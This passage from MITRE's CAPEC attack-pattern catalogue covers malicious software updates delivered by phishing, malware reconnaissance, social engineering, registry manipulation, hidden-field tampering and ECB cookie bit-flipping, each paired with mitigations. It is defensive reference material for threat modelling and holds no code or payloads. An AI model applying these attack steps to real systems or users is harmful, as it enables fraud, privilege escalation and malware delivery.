ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	187	Malicious Automated Software Update via Redirection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	533	Malicious Manual Software Update
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	614	Rooting SIM Cards
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	657	Malicious Automated Software Update via Spoofing
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	98	Phishing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain, Social Engineering
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Execution Flow

Explore

Identify target: The adversary must first identify what they want their target to be. Because malicious software updates can be carried out in a variety of ways, the adversary will first not only identify a target program, but also what users they wish to target. This attack can be targeted (a particular user or group of users) or untargeted (many different users).

Experiment

Craft a deployment mechanism based on the target: The adversary must craft a deployment mechanism to deploy the malicious software update. This mechanism will differ based on if the attack is targeted or untargeted.

Techniques
Targeted attack: hosting what appears to be a software update, then harvesting actual email addresses for an organization, or generating commonly used email addresses, and then sending spam, phishing, or spear-phishing emails to the organization's users requesting that they manually download and install the malicious software update.
Targeted attack: Instant Messaging virus payload, which harvests the names from a user's contact list and sends instant messages to those users to download and apply the update
Untargeted attack: Spam the malicious update to as many users as possible through unsolicited email, instant messages, or social media messages.
Untargeted attack: Send phishing emails to as many users as possible and pretend to be a legitimate source suggesting to download an important software update.
Untargeted attack: Use trojans/botnets to aid in either of the two untargeted attacks.

Exploit

Deploy malicious software update: Using the deployment mechanism from the previous step, the adversary gets a user to install the malicious software update.

Skills Required

[Level: High]

This attack requires advanced cyber capabilities

Resources Required

Manual or user-assisted attacks require deceptive mechanisms to trick the user into clicking a link or downloading and installing software. Automated update attacks require the adversary to host a payload and then trigger the installation of the payload code.

Consequences

Scope	Impact	Likelihood
Access Control Availability Confidentiality	Execute Unauthorized Commands

Mitigations

Validate software updates before installing.

Example Instances

Using an automated process to download and install dangerous code was key part of the NotPeyta attack [REF-697]

Related Weaknesses

CWE-ID	Weakness Name
494	Download of Code Without Integrity Check

Notes

Other

Other class of attacks focus on firmware, where malicious updates are made to the core system firmware or BIOS. Since this occurs outside the controls of the operating system, the OS detection and prevention mechanisms do not aid, thus allowing an adversary to evade defenses as well as gain persistence on the target's system.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.002	Supply Chain Compromise: Compromise Software Supply Chain

References

[REF-697] Microsoft Defender Security Research Team. "New ransomware, old techniques: Petya adds worm capabilities". Microsoft. 2017. <https://www.microsoft.com/security/blog/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>. URL validated: 2022-02-15.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Activation_Zone, Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Solutions_and_Mitigations, Typical_Severity
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Description Summary
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Notes
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow, Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Extended_Description, References, Resources_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-529: Malware-Directed Internal Reconnaissance

Attack Pattern ID: 529

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	270	Modification of Registry Run Keys
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	457	USB Memory Attacks

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary must have internal, logical access to the target network and system.

Skills Required

[Level: Medium]

The adversary must be able to obtain or develop, as well as place malicious software inside the target network/system.

Resources Required

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Keep patches up to date by installing weekly or daily if possible.

Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.

Related Weaknesses

General: This attack pattern does not depend upon an underlying system, application, or component weakness and, therefore, cannot be mapped to the Common Weakness Enumeration (CWE) body of knowledge.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations

CAPEC CATEGORY: Manipulate Data Structures

Category ID: 255

Summary

Membership

Nature	Type	ID	Name
MemberOf	View - A view in CAPEC represents a perspective with which one might look at the collection of attack patterns defined within CAPEC. There are three different types of views: graphs, explicit slices, and implicit slices.	1000	Mechanisms of Attack
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	123	Buffer Manipulation
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	124	Shared Resource Manipulation
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	129	Pointer Manipulation
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	153	Input Data Manipulation

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Description, Relationships

CAPEC-416: Manipulate Human Behavior

Attack Pattern ID: 416

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	407	Pretexting
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	417	Influence Perception
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	425	Target Influence via Framing
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	426	Influence via Incentives
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	427	Influence via Psychological Principles

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must have the means and knowledge of how to communicate with the target in some manner.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Other

Mitigations

An organization should provide regular, robust cybersecurity training to its employees to prevent successful social engineering attacks.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Methods_of_Attack, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Target Influence via Social Engineering

CAPEC-203: Manipulate Registry Information

Attack Pattern ID: 203

Abstraction: Standard

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	176	Configuration/Environment Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	51	Poison Web Service Registry
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	270	Modification of Registry Run Keys
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	478	Modification of Windows Service Configuration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The targeted application must rely on values stored in a registry.

The adversary must have a means of elevating permissions in order to access and modify registry content through either administrator privileges (e.g., credentialed access), or a remote access tool capable of editing a registry through an API.

Skills Required

[Level: High]

The adversary requires privileged credentials or the development/acquiring of a tailored remote access tool.

Resources Required

None: No specialized resources are required to execute this type of attack.

Mitigations

Ensure proper permissions are set for Registry hives to prevent users from modifying keys.

Employ a robust and layered defensive posture in order to prevent unauthorized users on your system.

Employ robust identification and audit/blocking using an allowlist of applications on your system. Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern.

Example Instances

Manipulating registration information can be undertaken in advance of a path traversal attack (inserting relative path modifiers) or buffer overflow attack (enlarging a registry value beyond an application's ability to store it).

Related Weaknesses

CWE-ID	Weakness Name
15	External Control of System or Configuration Setting

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1112	Modify Registry
1647	Plist Modification

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Activation_Zone, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, References, Related_Weaknesses, Solutions_and_Mitigations
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations, Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2018-07-31 (Version 2.12)	Manipulate Application Registry Values

CAPEC CATEGORY: Manipulate System Resources

Category ID: 262

Summary

Membership

Nature	Type	ID	Name
MemberOf	View - A view in CAPEC represents a perspective with which one might look at the collection of attack patterns defined within CAPEC. There are three different types of views: graphs, explicit slices, and implicit slices.	1000	Mechanisms of Attack
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	161	Infrastructure Manipulation
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	165	File Manipulation
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	176	Configuration/Environment Manipulation
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	184	Software Integrity Attack
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	438	Modification During Manufacture
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	439	Manipulation During Distribution
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	440	Hardware Integrity Attack
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	441	Malicious Logic Insertion
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	548	Contaminate Resource
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	607	Obstruction

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Relationships
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Description, Relationships
Previous Entry Names
Change Date	Previous Entry Name
2017-01-09 (Version 2.9)	Manipulate Resources

CAPEC CATEGORY: Manipulate Timing and State

Category ID: 172

Summary

Membership

Nature	Type	ID	Name
MemberOf	View - A view in CAPEC represents a perspective with which one might look at the collection of attack patterns defined within CAPEC. There are three different types of views: graphs, explicit slices, and implicit slices.	1000	Mechanisms of Attack
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	25	Forced Deadlock
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	26	Leveraging Race Conditions
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	74	Manipulating State

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Relationships

CAPEC-162: Manipulating Hidden Fields

Attack Pattern ID: 162

Abstraction: Detailed

View customized information:

Description

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	77	Manipulating User-Controlled Variables

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Probe target web application: The adversary first probes the target web application to find all possible pages that can be visited on the website.
Techniques
Use a spidering tool to follow and record all links
Use a proxy tool to record all links visited during a manual traversal of the web application.
Find hidden fields: Once the web application has been traversed, the adversary looks for all hidden HTML fields present in the client-side.
Techniques
Use the inspect tool on all modern browsers and filter for the keyword "hidden"
Specifically look for hidden fields inside form elements.

Experiment

Send modified hidden fields to server-side: Once the adversary has found hidden fields in the client-side, they will modify the values of these hidden fields one by one and then interact with the web application so that this data is sent to the server-side. The adversary observes the response from the server to determine if the values of each hidden field are being validated.

Exploit

Manipulate hidden fields: Once the adversary has determined which hidden fields are not being validated by the server, they will manipulate them to change the normal behavior of the web application in a way that benefits the adversary.
Techniques
Manipulate a hidden field inside a form element and then submit the form so that the manipulated data is sent to the server.

Prerequisites

The targeted site must contain hidden fields to be modified.

The targeted site must not validate the hidden fields with backend processing.

Resources Required

The adversary must have the ability to modify hidden fields by editing the HTTP response to the server.

Related Weaknesses

CWE-ID	Weakness Name
602	Client-Side Enforcement of Server-Side Security

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Prerequisites, Description Summary, Resources_Required
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Execution_Flow
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	Manipulating hidden fields to change the normal flow of transactions (eShoplifting)

CAPEC-39: Manipulating Opaque Client-based Data Tokens

Attack Pattern ID: 39

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	22	Exploiting Trust in Client
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	31	Accessing/Intercepting/Modifying HTTP Cookies

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Enumerate information passed to client side: The attacker identifies the parameters used as part of tokens to take business or security decisions

Techniques
Use WebScarab to reveal hidden fields while browsing.
Use a sniffer to capture packets
View source of web page to find hidden fields
Examine URL to see if any opaque tokens are in it
Disassemble or decompile client-side application
Use debugging tools such as File Monitor, Registry Monitor, Debuggers, etc.

Determine protection mechanism for opaque token: The attacker determines the protection mechanism used to protect the confidentiality and integrity of these data tokens. They may be obfuscated or a full blown encryption may be used.
Techniques
Look for signs of well-known character encodings
Look for cryptographic signatures
Look for delimiters or other indicators of structure

Experiment

Modify parameter/token values: Trying each parameter in turn, the attacker modifies the values
Techniques
Modify tokens logically
Modify tokens arithmetically
Modify tokens bitwise
Modify structural components of tokens
Modify order of parameters/tokens

Cycle through values for each parameter.: Depending on the nature of the application, the attacker now cycles through values of each parameter and observes the effects of this modification in the data returned by the server

Techniques
Use network-level packet injection tools such as netcat
Use application-level data modification tools such as Tamper Data, WebScarab, TamperIE, etc.
Use modified client (modified by reverse engineering)
Use debugging tools to modify data in client

Prerequisites

An attacker already has some access to the system or can steal the client based data tokens from another user who has access to the system.

For an Attacker to viably execute this attack, some data (later interpreted by the application) must be held client-side in a way that can be manipulated without detection. This means that the data or tokens are not CRCd as part of their value or through a separate meta-data store elsewhere.

Skills Required

[Level: Medium]

If the client site token is obfuscated.

[Level: High]

If the client site token is encrypted.

Resources Required

The Attacker needs no special hardware-based resources in order to conduct this attack. Software plugins, such as Tamper Data for Firefox, may help in manipulating URL- or cookie-based data.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

One solution to this problem is to protect encrypted data with a CRC of some sort. If knowing who last manipulated the data is important, then using a cryptographic "message authentication code" (or hMAC) is prescribed. However, this guidance is not a panacea. In particular, any value created by (and therefore encrypted by) the client, which itself is a "malicious" value, all the protective cryptography in the world can't make the value 'correct' again. Put simply, if the client has control over the whole process of generating and encoding the value, then simply protecting its integrity doesn't help.

Make sure to protect client side authentication tokens for confidentiality (encryption) and integrity (signed hash)

Make sure that all session tokens use a good source of randomness

Perform validation on the server side to make sure that client side data tokens are consistent with what is expected.

Example Instances

With certain price watching websites, that aggregate products available prices, the user can buy items through whichever vendors has product availability, the best price, or other differentiator. Once a user selects an item, the site must broker the purchase of that item with the vendor. Because vendors sell the same product through different channel partners at different prices, token exchange between price watching sites and selling vendors will often contain pricing information. With some price watching sites, manipulating URL-data (which is encrypted) even opaquely yields different prices charged by the fulfilling vendor. If the manipulated price turns out higher, the Attacker can cancel purchase. If the Attacker succeeded in manipulating the token and creating a lower price, they proceed.

Upon successful authentication user is granted an encrypted authentication cookie by the server and it is stored on the client. One piece of information stored in the authentication cookie reflects the access level of the user (e.g. "u" for user). The authentication cookie is encrypted using the Electronic Code Book (ECB) mode, that naively encrypts each of the plaintext blocks to each of the ciphertext blocks separately. An attacker knows the structure of the cookie and can figure out what bits (encrypted) store the information relating to the access level of the user. An attacker modifies the authentication cookie and effectively substitutes "u" for "a" by flipping some of the corresponding bits of ciphertext (trial and error). Once the correct "flip" is found, when the system is accessed, the attacker is granted administrative privileges in the system. Note that in this case an attacker did not have to figure out the exact encryption algorithm or find the secret key, but merely exploit the weakness inherent in using the ECB encryption mode.

